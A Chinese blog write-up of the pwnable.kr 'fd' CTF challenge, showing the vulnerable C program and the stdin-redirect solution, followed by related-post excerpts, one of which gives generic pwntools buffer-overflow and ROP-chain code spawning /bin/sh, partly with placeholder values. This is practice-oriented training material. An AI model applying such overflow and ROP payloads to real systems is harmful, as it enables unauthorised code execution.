pwnable.kr 【fd】

最新推荐文章于 2023-02-08 15:28:31 发布
原创 最新推荐文章于 2023-02-08 15:28:31 发布 · 400 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过构造特定字符串来控制文件描述符(fd)的方法,以实现Linux环境下特定程序的flag获取。通过理解read()函数及atoi()函数的工作原理,文章详细展示了如何寻找一个字符串,使其转换为整型后的值等于预设数值0x1234,并最终通过标准输入成功匹配目标字符串LETMEWIN,进而获得程序隐藏的flag。

1.题目

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
        if(argc<2){
                printf("pass argv[1] a number\n");
                return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
                printf("good job :)\n");
                system("/bin/cat flag");
                exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;

}

WP:

这题的逻辑相当简单,需要知道的是read( )函数以及atoi( )函数的作用,很明显要拿到flag,需要将buf和“LETMEWIN”进行对比,相同则输出flag,fd是文件描述符,read( )的作用就是从fd指向的文件中读取字节到缓冲区中,当fd为0时,代表从标准输入读取,那么只要构造fd为0,fd = atoi( argv[1] ) - 0x1234,atoi( )函数是将字符串转化为整形数,那么我们只要找到一个字符串使它转换之后的结果为0x1234即可,写一个程序。

#include<stdio.h>
#include<stdlib.h>
int main(){

        char str[10];
        int b=0x1234;
        sprintf(str,"%d",b);
    printf("%s\n",str);
        printf("%d\n",atoi(str)-0x1234);

}

运行后结果为:

4660
0

于是得到字符串,然后一条命令即可得到flag

echo LETMEWIN | ./fd 4660

pwnable.kr】0x01-fd Writeup
weixin_64667536的博客
08-20 348
Ubuntu连接靶机(连不通的可以试一下proxychains)scp命令拷贝下fd源码文件。
pwnable.kr做题笔记(一)
has_zaoganmaqule的博客
08-12 2112
调用 `printf` 函数,`bl` 指令用于分支并链接,保存返回地址到链接寄存器 `lr`。- 将 `r4`, `r11`, 和 `lr` 寄存器的值压入栈中,用于保存函数调用前的状态。- 将 `r3` 的值(0)存储到 `r11` 指向的位置的偏移量 -16 处。- 如果 `r2` 和 `r3` 不相等,跳转到 `0x8da8` 地址处。- 调用 `scanf` 函数,`r0` 和 `r1` 作为参数传递。- 从 `r11` 指向的位置的偏移量 -16 处加载值到 `r3`。
pwnable.krfd
搓雪小怪兽的工作室
04-11 239
签到题。直接ssh连接。 可以看到fd.c源码如下: #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass arg...
pwn学习:pwnable.kr fd
Richard_pl的博客
03-11 539
Day 1: Study pwn via pwnable.kr——fd 写在前面: 记录自己的学习过程,从零开始。。。 首先ssh连接远程主机 查看文件相关权限 从第一个文件可以看出,文件由fd_pwn所有,同属于fd组。字节大小为7322,创建时间Jun 11 2014(看来已经创建好久了。。),文件名fd。 最重要的就是文件的访问权限了,-r-sr-x–表示文件所有者拥有读文件的权限,f...
pwnable.kr - fd
无节操
12-19 3706
题目: 题目链接:http://pwnable.kr/play.php ——> 连接登录:ssh fd@pwnable.kr -p2222查看文件及权限:ls -al看到flag文件,但是当前用户fd并没有读权限。 查看fd.ccat fd.c目标:执行system(“/bin/cat flag”); 则:strcmp(“LETMEWIN\n”, buf) == 0 则:buf =
pwnable.kr fd
weixin_44795952的博客
04-07 251
pwnable.kr:fd 连入: ssh fd@pwnable.kr -p2222 输入密码:guest ls cat flag发现 Permission denied 继续cat fd.c 关于main函数参数: agrc代表 agrv[] 的个数 默认为1:即agrv[0] 参数默认为文件名 我们需要知道read函数: read() 用于文件描述符对应的文件中读取数据,原型: ssiz...
[CTF]pwnable.kr fd Wp
网络安全知识分享
03-22 5460
pwnable.kr fd Wp 给大家推荐一个优秀的pwn练习平台 点我!!!点我!!! 今天分享第一题 fd 首先解决一下我的虚拟机没有网络的问题,没有做任何修改的情况下,我的kali没有网络了,输入ifconfig -a,发现我的电脑没有网卡了 这个时候用vim打开vim /etc/network/interfaces 将这个语句添加即可 auto eth0 iface eth0 inet dhcp 然后重新启动服务 /etc/init.d/networking restart 之后还是不太行
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 1391
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
[pwnable.kr]fd
iekuil的博客
09-25 261
关于文件描述符,可以参考https://blog.csdn.net/yushuaigee/article/details/107883964。read的函数原型是int read (int handle,void *buf,int len)如果if语句中strcmp函数判断两个字符串相等,就会读取并回显flag文件的内容。执行时附带参数4660,然后输入LETMEWIN,即可成功读取flag。回到这个题里,我们每次执行fd文件都是一个全新的进程。注意到输入的fd会减去0x1234,即4660。
PWN fd [pwnable.kr]CTF writeup题解系列1
重新启程
01-01 604
题目地址:http://pwnable.kr/play.php 题目地址页面,看看还是挺有意思的,还有一些图片。 看看题目: 题目比较简单,直接把解题过程列出来 root@mypwn:/ctf/work/reverse# ssh fd@pwnable.kr -p2222 The authenticity of host '[pwnable.kr]:2222 ([128.61.24...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3479
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
pwnable.kr第七八题 input leg
weixin_42877778的博客
02-08 490
pwnable.kr 第七题input 第八题leg
【Pwn】NCTF2019 pwn me 100 years! (Ⅲ)
Nothing
11-28 8380
main函数 首先创建了一个0x10大小的堆块,最后如果这个堆块的值为0x66666666那么执行/bin/sh。那么想办法分配到这块内存空间即可。 看看中间的菜单,找到漏洞在edit函数中,read为固定的0x20个字节,由于最小堆块的大小是0x10,共享pre_size的8个字节,0x10和0x18分配的大小都是0x10字节,所以存在0x10个字节的溢出,但是0x10大小的字节只能覆盖到...
【pwn】ciscn_2019_s_3
Nothing
12-14 4876
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
【pwn】ciscn_2019_es_2
Nothing
12-24 2942
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2637
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
【pwn】WMCTF2020 cfgo-CheckIn
Nothing
08-03 2403
拿到二进制后先解UPX,解完后发现程序还是很复杂,发现是cgo,做题的时候不知道有没有这种的插件支持,问了下做逆向的队友,似乎插件版本没有更新到这个版本,静态分析没有进展,先看看远程服务是跑啥的。 一个迷宫,走到旗子的位置就行了,一共100关,一波深搜就行了,解决了100关后出现了。 在二进制中搜索字符串无果,就当blind pwn做了,输入name后程序就退出了,可能存在的漏洞格式化字符串以及溢出,尝试发现没有格式化字符串漏洞,然后尝试溢出。当输入了0x78个字符后发现出现了报错信息。这里报错信息还是
【pwn】roarctf_2019_easy_pwn
Nothing
12-24 2211
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2154
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
pwnable.kr bof
最新发布
09-16
### pwnable.kr bof题目概述 pwnable.kr 是一个著名的在线渗透测试练习平台,bof(Buffer Overflow,缓冲区溢出)题目是其中经典类型。缓冲区溢出通常是由于程序没有正确检查用户输入的长度,导致输入的数据超出了缓冲区的边界,从而覆盖相邻的内存区域,可能改变程序的执行流程。 ### 解题思路与步骤 #### 1. 环境准备 首先需要在本地搭建好调试环境,安装必要的工具,如`gdb`(GNU调试器)、`pwntools`(Python 库,用于编写漏洞利用脚本)等。例如,使用`pwntools`可以方便地与远程服务器进行交互。 ```python from pwn import * # 连接到远程服务器 p = remote('pwnable.kr', 9000) ``` #### 2. 分析程序 - **反汇编**:使用`objdump`或`gdb`对目标程序进行反汇编,查看程序的汇编代码,了解程序的逻辑和函数调用关系。例如,使用`objdump -d bof`可以得到程序的反汇编代码。 - **检查漏洞点**:重点关注程序中存在缓冲区操作的函数,如`gets`、`strcpy`等,这些函数通常不检查输入的长度,容易引发缓冲区溢出漏洞。 #### 3. 确定缓冲区大小 通过调试程序,向程序输入不同长度的数据,观察程序的行为,确定缓冲区的大小。可以使用`gdb`设置断点,在关键位置查看栈的状态。 ```python # 构造不同长度的测试数据 test_data = 'A' * 10 p.sendline(test_data) ``` #### 4. 覆盖返回地址 当确定了缓冲区大小后,构造恶意输入,覆盖程序的返回地址。返回地址是函数调用结束后程序要跳转执行的地址,通过覆盖它可以改变程序的执行流程。 ```python # 计算返回地址的偏移量 offset = 44 # 假设偏移量为 44 # 构造恶意输入 payload = 'A' * offset # 获取目标地址(如系统函数地址) target_address = p64(0xdeadbeef) payload += target_address p.sendline(payload) ``` #### 5. 利用漏洞执行任意代码 - **调用系统函数**:如果程序中存在可利用的系统函数(如`system`),可以通过覆盖返回地址,将程序的执行流程引导到这些函数上,并传入合适的参数(如`/bin/sh`),从而获得一个 shell。 - **ROP 链**:如果程序中没有合适的系统函数可以直接调用,可以使用 ROP(Return Oriented Programming,面向返回编程)技术,通过拼接多个小的代码片段(gadget)来实现复杂的功能。 ```python # 构造 ROP 链 rop = ROP(elf) # 查找合适的 gadget pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] bin_sh = next(elf.search(b'/bin/sh')) system_addr = elf.symbols['system'] # 构造 ROP 链 rop.raw(pop_rdi) rop.raw(bin_sh) rop.raw(system_addr) # 构造最终的 payload payload = 'A' * offset + str(rop) p.sendline(payload) ``` ### 技术分析 #### 缓冲区溢出原理 缓冲区溢出是由于程序对输入数据的长度没有进行有效的检查,导致输入的数据超出了缓冲区的边界,覆盖了相邻的内存区域。在栈上,函数调用时会保存返回地址等信息,当缓冲区溢出发生时,返回地址可能被覆盖,从而改变程序的执行流程。 #### 栈布局与内存管理 了解栈的布局对于利用缓冲区溢出漏洞至关重要。栈是一种后进先出的数据结构,函数调用时会在栈上分配空间,保存局部变量、参数和返回地址等信息。通过调试和分析栈的状态,可以确定缓冲区的位置和返回地址的偏移量。 #### 保护机制绕过 现代操作系统和编译器通常会采用一些保护机制,如 ASLR(地址空间布局随机化)、Canary(栈保护)等,来防止缓冲区溢出漏洞的利用。在解题过程中,需要了解这些保护机制,并寻找相应的绕过方法。例如,对于 ASLR,可以通过泄露程序的基地址来绕过;对于 Canary,可以通过泄露 Canary 的值来绕过。 ### 总结 解决 pwnable.kr 的 bof 题目需要掌握缓冲区溢出的基本原理、调试技巧和漏洞利用技术。通过不断地练习和实践,可以提高对漏洞的分析和利用能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值